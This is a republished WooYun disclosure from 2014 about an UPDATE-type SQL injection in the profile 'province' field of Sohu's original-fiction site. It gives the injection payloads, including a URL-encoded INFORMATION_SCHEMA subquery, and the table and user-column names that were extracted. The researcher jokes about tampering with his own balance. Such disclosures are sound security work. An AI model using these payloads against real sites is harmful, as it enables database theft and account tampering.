搜狐原创小说频道SQL注入导致暴库(大量用户资料泄露)

admin 2015年5月2日11:19:44评论305 views字数 230阅读0分46秒阅读模式
摘要

2014-07-19: 细节已通知厂商并且等待厂商处理中
2014-07-21: 厂商已经确认,细节仅向厂商公开
2014-07-31: 细节向核心白帽子及相关领域专家公开
2014-08-10: 细节向普通白帽子公开
2014-08-20: 细节向实习白帽子公开
2014-09-02: 细节向公众公开

漏洞概要 关注数(6) 关注此漏洞

缺陷编号: WooYun-2014-69029

漏洞标题: 搜狐原创小说频道SQL注入导致暴库(大量用户资料泄露)

相关厂商: 搜狐

漏洞作者: 爱上电饭锅

提交时间: 2014-07-19 18:33

公开时间: 2014-09-02 18:34

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: SQL注入 敏感资料泄露 UPDATE型SQL注入

2人收藏


漏洞详情

披露状态:

2014-07-19: 细节已通知厂商并且等待厂商处理中
2014-07-21: 厂商已经确认,细节仅向厂商公开
2014-07-31: 细节向核心白帽子及相关领域专家公开
2014-08-10: 细节向普通白帽子公开
2014-08-20: 细节向实习白帽子公开
2014-09-02: 细节向公众公开

简要描述:

搜狐原创小说频道个人中心存在SQL注入,可读取全部表资料。看着这个洞,想着搜狐某工周一又要加班了,总算踏实了。顺便问问,有没有狐狸公仔来一个?

详细说明:

前几天报的平行越权好像已经修复了,这大周末的怎么能再让搜狐某工加班呢?

为了避开UI验证,用直接Request到服务器的方法仔细打探了一下各个参数,最终发现“所在省份”表现奇特,应该存在SQL注入。首先试了以下参数:

1',msn='2',qq='3

更新后发现MSN和QQ并没有更新,但是地址变成了“1”。这说明更新成功了,但是为什么msn和qq没成功呢?两种可能:1.过滤了?2.覆盖了?

要是1就悲剧了,先乐观点试试2。用以下参数:

1',province='2',qq='3

走起!成功了!地址显示“2”!

接下来来点高级应用?INFORMATION_SCHEMA.TABLES?INFORMATION_SCHEMA.COLUMNS?

最终253个数据表(含系统表)一览无余,顺便看了一下用户基本信息表,里面有很多敏感信息,包括搜狐passport,剩余金币,月票数量等。

以下是截取表列表:

amonitor_log

amonitor_log_chapter

book_author_yc

book_author_yc_bak

book_book

book_bookmark

book_bookshell

book_book_bak

book_category_pri

book_category_sec

book_content

book_content_bak

book_volume

book_volume_bak

category_available

CHARACTER_SETS

CLIENT_STATISTICS

COLLATIONS

COLLATION_CHARACTER_SET_APPLICABILITY

COLUMNS

COLUMN_PRIVILEGES

ENGINES

EVENTS

FILES

GLOBAL_STATUS

GLOBAL_TEMPORARY_TABLES

GLOBAL_VARIABLES

INDEX_STATISTICS

INNODB_BUFFER_POOL_PAGES

INNODB_BUFFER_POOL_PAGES_BLOB

INNODB_BUFFER_POOL_PAGES_INDEX

INNODB_CMP

INNODB_CMPMEM

INNODB_CMPMEM_RESET

INNODB_CMP_RESET

INNODB_INDEX_STATS

INNODB_LOCKS

INNODB_LOCK_WAITS

INNODB_RSEG

INNODB_SYS_INDEXES

INNODB_SYS_STATS

INNODB_SYS_TABLES

INNODB_TABLE_STATS

INNODB_TRX

js_data_cp

keywords_available

keyword_time

KEY_COLUMN_USAGE

multi_passport

PARTITIONS

PLUGINS

PROCESSLIST

PROFILING

QUERY_RESPONSE_TIME

REFERENTIAL_CONSTRAINTS

ROUTINES

SCHEMATA

SCHEMA_PRIVILEGES

sell_cp

sell_cp1

sell_cp_list

SESSION_STATUS

SESSION_VARIABLES

STATISTICS

TABLES

TABLE_CONSTRAINTS

TABLE_PRIVILEGES

TABLE_STATISTICS

TEMPORARY_TABLES

THREAD_STATISTICS

TRIGGERS

t_accounting_book_income

t_accounting_contract_book_file_info

t_accounting_contract_book_info

t_accounting_contract_info

t_accounting_cp_info

t_accounting_uploadbill_file_info

t_accounting_user

t_accounting_user_cp_info

t_account_recharge_log

t_account_recharge_log_test

t_admin_group

t_admin_groupmodule

t_admin_grouppermission

t_admin_groupuser

t_admin_module

t_admin_permission

t_author_account

t_author_action_log

t_author_application

t_author_application_type

t_author_base_info

t_author_consult_info

t_author_rates

t_author_systemmsg_log

t_author_welfare_income

t_blog

t_bookman_income

t_book_ad

t_book_base_info

t_book_base_info_recover

t_book_base_info_xiaxian

t_book_base_log

t_book_black_user

t_book_chapter

t_book_chapter_20130115_recover

t_book_chapter_content

t_book_chapter_cp_zhua

t_book_chapter_leave

t_book_chapter_month_subscription

t_book_chapter_recommend

t_book_chapter_subscription

t_book_class

t_book_content_report

t_book_income

t_book_info_modify_log

t_book_integral_channel

t_book_integral_exchange_code

t_book_integral_project

t_book_into_proportion

t_book_jifen_exchange_code

t_book_jifen_project

t_book_manager

t_book_mobile_rsync_list

t_book_month_subscription

t_book_publish

t_book_recommend

t_book_relation_Info

t_book_review

t_book_review_administrator

t_book_review_administrator_operation

t_book_review_back

t_book_section

t_book_single_work_subscription

t_book_vote

t_book_vote_item

t_book_xiaxian

t_copyright_partner

t_date_dimension

t_editor

t_editor_log

t_editor_message

t_editor_recommend

t_editor_recommend_period

t_editor_recommend_type

t_fmx_book_info

t_fxm_book_chapter

t_import_book_data

t_month_dimension

t_order_box_succ

t_order_sms_advance

t_order_sms_quit

t_order_sms_receive

t_order_sms_succ

t_pay_bank_log

t_pay_bank_log_test

t_stat_msohu_activate_user_count

t_stat_msohu_dianping_info

t_stat_msohu_downloadtimes_info

t_stat_msohu_search_info

t_stat_msohu_upload_info

t_stat_mxp_company_data_list

t_stat_mxp_company_templet_day_info

t_stat_mxp_compay_day_order_info

t_stat_mxp_days_order_info

t_stat_mxp_days_paytype_info

t_stat_mxp_days_transport_info

t_stat_mxp_day_success_info

t_stat_mxp_income_recharge_info

t_stat_mxp_templet_day_info

t_stat_mxp_transport_person_info

t_stat_mxp_trans_card_info

t_stat_mxp_user_info

t_stat_ting_charge_day_info

t_stat_ting_charge_toproduct_day_info

t_stat_ting_composite_order_info

t_stat_ting_download_to_phone_info

t_stat_ting_income_day_info

t_stat_ting_income_info

t_stat_ting_income_register_info

t_stat_ting_income_topaytype_day_info

t_stat_ting_iphone_income_info

t_stat_ting_listen_day_info

t_stat_ting_mail_corp_info

t_stat_ting_monincome_topaytype_day_info

t_stat_ting_month_income

t_stat_ting_pay_user_info

t_stat_ting_person_listen_info

t_stat_ting_product_info

t_stat_ting_product_order_info

t_stat_ting_search_day_info

t_stat_ting_sub_product_day_info

t_stat_ting_sub_product_info

t_stat_ting_union_income_info

t_stat_ting_user_day_info

t_stat_ting_user_day_info_temp01

t_stat_ting_user_day_info_temp02

t_stat_ting_user_day_info_temp03

t_stat_ting_user_day_info_temp04

t_stat_ting_user_day_info_temp05

t_stat_yc_activate_user

t_stat_yc_author_income

t_stat_yc_baoyue_day

t_stat_yc_baoyue_month

t_stat_yc_book_collect

t_stat_yc_book_sell

t_stat_yc_chapter_subscription

t_stat_yc_editor

t_stat_yc_search_log

t_stat_yc_user_consumer

t_stat_yc_user_consumer_log

t_stat_yc_user_recharge

t_stat_yc_user_recharge_log

t_stat_yc_vip_user

t_stat_yc_wap_user

t_system_message

t_table_test

t_tsw_pcdownload_dayinfo

t_user_action_log

t_user_base_info

t_user_base_info_bak0528

t_user_base_info_restore

t_user_base_info_temp

t_user_base_info_test

t_user_click_book_log

t_user_click_book_log_temp

t_user_click_book_log_test

t_user_code

t_user_collect_log

t_user_dashang_log

t_user_gain_jifen_log

t_user_huodong

t_user_huodong_log

t_user_indiv_service_set

t_user_level

t_user_level_power

t_user_mobile_send_log

t_user_personal_data

t_user_promotion_log

t_user_qiandao

t_user_read_book_set

t_user_recharge_log

t_user_recharge_log_test

t_user_vote_log

t_user_wap_pay_log

t_user_wap_subscribe_log

t_user_yuepiao_log

USER_PRIVILEGES

USER_STATISTICS

VIEWS

XTRADB_ADMIN_COMMAND

XTRADB_ENHANCEMENTS

yiruite_send

以下是t_user_base_info表的列:

amonitor_state

beforeamount

collected_num

collect_num

daka_date

icon_status

id

Integral

jifen

lastpaydate

lastreturntype

level

logdate

login_date

login_num

nickname

nickname_s

passport

passport_s

payamount

remain_coin

status

user_icon

user_type

yuepiao

这要是改一把,我是不是就可以在知识的海洋里畅读了?

但是我还是喜欢公仔,不知道有没有小狐狸公仔做个小礼物?

漏洞证明:

1. 抓包。

2. 把province参数改为。124%27%2Cprovince%3D(SELECT%20SUBSTRING(column_name%2C1%2C15)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%20%3D%20%27t_user_base_info%27%20ORDER%20BY%20column_name%20LIMIT%2010%2C1)%2Cmsn%3D%272

3. 地址变为t_user_base_info中某列的名称。

搜狐原创小说频道SQL注入导致暴库(大量用户资料泄露)

修复方案:

只好加班了

版权声明:转载请注明来源 爱上电饭锅@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-07-21 10:25

厂商回复:

感谢支持。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-07-20 21:25 | pandas ( 普通白帽子 | Rank:730 漏洞数:84 | 国家特级保护动物)

    0

    这种心态不可取阿

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin